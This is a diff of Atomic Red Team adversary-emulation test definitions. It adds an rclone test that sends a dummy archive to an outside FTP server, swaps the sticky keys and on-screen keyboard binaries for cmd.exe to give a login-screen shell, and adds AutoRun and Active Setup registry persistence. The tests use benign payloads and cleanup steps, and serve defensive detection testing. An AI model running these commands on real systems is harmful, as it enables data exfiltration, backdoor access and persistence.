|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
|
||||
```
|
||||
##### Description: Check if rclone zip exists
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
|
||||
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -159,3 +159,49 @@ atomic_tests:
|
||||
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
|
||||
$ftp_del.GetResponse()}} catch{}
|
||||
name: powershell
|
||||
- name: Exfiltration Over Alternative Protocol - FTP - Rclone
|
||||
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
|
||||
description: |-
|
||||
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
|
||||
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
ftp_server:
|
||||
description: Your own ftp server
|
||||
type: string
|
||||
default: ftp.dlptest.com
|
||||
ftp_pass:
|
||||
description: Your FTP user's password
|
||||
type: string
|
||||
default: rNrKYTX9g7z3RgJRmxWuGHbeu
|
||||
ftp_user:
|
||||
description: Your FTP username
|
||||
type: string
|
||||
default: dlpuser
|
||||
ftp_port:
|
||||
description: Your FTP's port
|
||||
type: string
|
||||
default: 21
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if the exfil package exists
|
||||
prereq_command: |
|
||||
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
|
||||
- description: 'Check if rclone zip exists'
|
||||
prereq_command: |
|
||||
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
|
||||
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
|
||||
executor:
|
||||
command: |-
|
||||
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
|
||||
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
|
||||
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
|
||||
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
@@ -412,7 +412,7 @@ art-marker.txt is in the folder.
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
|
||||
@@ -178,7 +178,6 @@ atomic_tests:
|
||||
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
|
||||
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: PowerShell Downgrade Attack
|
||||
auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
|
||||
description: |
|
||||
|
||||
@@ -113,7 +113,7 @@ will be displayed. Additionally, open Registry Editor to view the new entry in H
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
@@ -135,7 +135,7 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
|
||||
## Atomic Test #2 - Modify Registry of Local Machine - cmd
|
||||
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
|
||||
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
@@ -1165,7 +1165,7 @@ See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/se
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
@@ -1441,7 +1441,7 @@ See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
@@ -1478,7 +1478,7 @@ More information - https://blog.trendmicro.com/trendlabs-security-intelligence/p
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
|
||||
@@ -14,13 +14,12 @@ atomic_tests:
|
||||
cleanup_command: |
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Modify Registry of Local Machine - cmd
|
||||
auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
|
||||
description: |
|
||||
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
|
||||
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
@@ -495,7 +494,6 @@ atomic_tests:
|
||||
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
|
||||
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Windows Powershell Logging Disabled
|
||||
auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
|
||||
description: |
|
||||
@@ -621,7 +619,6 @@ atomic_tests:
|
||||
reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
|
||||
reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Ursnif Malware Registry Key Creation
|
||||
auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
|
||||
description: |
|
||||
@@ -636,7 +633,6 @@ atomic_tests:
|
||||
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
|
||||
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Terminal Server Client Connection History Cleared
|
||||
auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
|
||||
description: |
|
||||
|
||||
@@ -30,7 +30,7 @@ Adds a command to the .bash_profile file of the current user
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| command_to_add | Command to add to the .bash_profile file | String | echo "Hello from Atomic Red Team T1546.004"|
|
||||
| command_to_add | Command to add to the .bash_profile file | String | echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
@@ -42,7 +42,8 @@ echo '#{command_to_add}' >> ~/.bash_profile
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
sed -i '/#{command_to_add}/d' ~/.bash_profile
|
||||
head -n '-2' ~/.bash_profile > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bash_profile
|
||||
```
|
||||
|
||||
|
||||
@@ -67,7 +68,7 @@ Adds a command to the .bashrc file of the current user
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| command_to_add | Command to add to the .bashrc file | String | echo "Hello from Atomic Red Team T1546.004"|
|
||||
| command_to_add | Command to add to the .bashrc file | String | echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
@@ -79,7 +80,8 @@ echo '#{command_to_add}' >> ~/.bashrc
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
sed -i '/#{command_to_add}/d' ~/.bashrc
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
```
|
||||
|
||||
|
||||
|
||||
@@ -12,12 +12,13 @@ atomic_tests:
|
||||
command_to_add:
|
||||
description: Command to add to the .bash_profile file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: |
|
||||
echo '#{command_to_add}' >> ~/.bash_profile
|
||||
cleanup_command: |
|
||||
sed -i '/#{command_to_add}/d' ~/.bash_profile
|
||||
head -n '-2' ~/.bash_profile > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bash_profile
|
||||
name: sh
|
||||
- name: Add command to .bashrc
|
||||
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
|
||||
@@ -30,10 +31,11 @@ atomic_tests:
|
||||
command_to_add:
|
||||
description: Command to add to the .bashrc file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: |
|
||||
echo '#{command_to_add}' >> ~/.bashrc
|
||||
cleanup_command: |
|
||||
sed -i '/#{command_to_add}/d' ~/.bashrc
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
name: sh
|
||||
|
||||
@@ -22,6 +22,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi
|
||||
|
||||
- [Atomic Test #2 - Replace binary of sticky keys](#atomic-test-2---replace-binary-of-sticky-keys)
|
||||
|
||||
- [Atomic Test #3 - Create Symbolic Link From osk.exe to cmd.exe](#atomic-test-3---create-symbolic-link-from-oskexe-to-cmdexe)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -101,7 +103,7 @@ Replace sticky keys binary (sethc.exe) with cmd.exe
|
||||
|
||||
|
||||
```cmd
|
||||
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
|
||||
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
|
||||
takeown /F C:\Windows\System32\sethc.exe /A
|
||||
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
|
||||
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
||||
@@ -116,4 +118,48 @@ copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Create Symbolic Link From osk.exe to cmd.exe
|
||||
Replace accessiblity executable with cmd.exe to provide elevated command prompt from login screen without logging in.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```cmd
|
||||
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```cmd
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
|
||||
icacls %windir%\system32\osk.exe /inheritance:d
|
||||
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
|
||||
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
|
||||
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
|
||||
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -54,11 +54,36 @@ atomic_tests:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
|
||||
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
|
||||
takeown /F C:\Windows\System32\sethc.exe /A
|
||||
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
|
||||
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
||||
cleanup_command: |
|
||||
copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
elevation_required: true
|
||||
- name: Create Symbolic Link From osk.exe to cmd.exe
|
||||
auto_generated_guid: 51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
description: |
|
||||
Replace accessiblity executable with cmd.exe to provide elevated command prompt from login screen without logging in.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
|
||||
cleanup_command: |
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
|
||||
icacls %windir%\system32\osk.exe /inheritance:d
|
||||
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
|
||||
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
|
||||
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
|
||||
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
|
||||
+85
-1
@@ -10,6 +10,10 @@ Since the execution can be proxied by an account with higher permissions, such a
|
||||
|
||||
- [Atomic Test #1 - Persistence with Custom AutodialDLL](#atomic-test-1---persistence-with-custom-autodialdll)
|
||||
|
||||
- [Atomic Test #2 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-2---hklm---persistence-using-commandprocessor-autorun-key-with-elevation)
|
||||
|
||||
- [Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-3---hkcu---persistence-using-commandprocessor-autorun-key-with-elevation)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -47,7 +51,7 @@ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Na
|
||||
##### Description: AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
|
||||
if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
@@ -58,4 +62,84 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** a574dafe-a903-4cce-9701-14040f4f3532
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| command | Command to Execute | string | notepad.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| command | Command to Execute | string | notepad.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
$path = "HKCU:\Software\Microsoft\Command Processor"
|
||||
if (!(Test-Path -path $path)){
|
||||
New-Item -ItemType Key -Path $path
|
||||
}
|
||||
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -15,7 +15,7 @@ atomic_tests:
|
||||
- description: |
|
||||
AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
|
||||
prereq_command: |
|
||||
if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
|
||||
if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"
|
||||
@@ -26,3 +26,44 @@ atomic_tests:
|
||||
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: |-
|
||||
New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: |-
|
||||
$path = "HKCU:\Software\Microsoft\Command Processor"
|
||||
if (!(Test-Path -path $path)){
|
||||
New-Item -ItemType Key -Path $path
|
||||
}
|
||||
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
@@ -480,7 +480,7 @@ to point to a new startup folder where a payload could be stored to launch at bo
|
||||
| payload | executable to be placed in new startup location | String | C:\Windows\System32\calc.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
|
||||
@@ -228,7 +228,6 @@ atomic_tests:
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
||||
Remove-Item "#{new_startup_folder}" -Recurse -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
- name: HKCU - Policy Settings Explorer Run Key
|
||||
auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
|
||||
@@ -332,3 +331,4 @@ atomic_tests:
|
||||
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
|
||||
@@ -0,0 +1,136 @@
|
||||
# T1547.014 - Active Setup
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/014)
|
||||
<blockquote>Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
|
||||
|
||||
Adversaries may abuse Active Setup by creating a key under <code> HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
|
||||
|
||||
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup](#atomic-test-1---hklm---add-atomic_test-key-to-launch-executable-as-part-of-user-setup)
|
||||
|
||||
- [Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry](#atomic-test-2---hklm---add-malicious-stubpath-value-to-existing-active-setup-entry)
|
||||
|
||||
- [Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number](#atomic-test-3---hklm---re-execute-internet-explorer-core-fonts-stubpath-payload-by-decreasing-version-number)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup
|
||||
This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and
|
||||
forcing to run active setup using the "runonce.exe /AlternateShellStartup" command.
|
||||
Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user.
|
||||
|
||||
Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in.
|
||||
The payload will only run once unless the cleanup command is run in between tests.
|
||||
|
||||
[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** deff4586-0517-49c2-981d-bbea24d48d71
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| payload | Payload to run once during login | String | C:\Windows\System32\calc.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry
|
||||
This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
|
||||
Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
|
||||
Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| payload | Payload to run once during login | String | C:\Windows\System32\calc.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
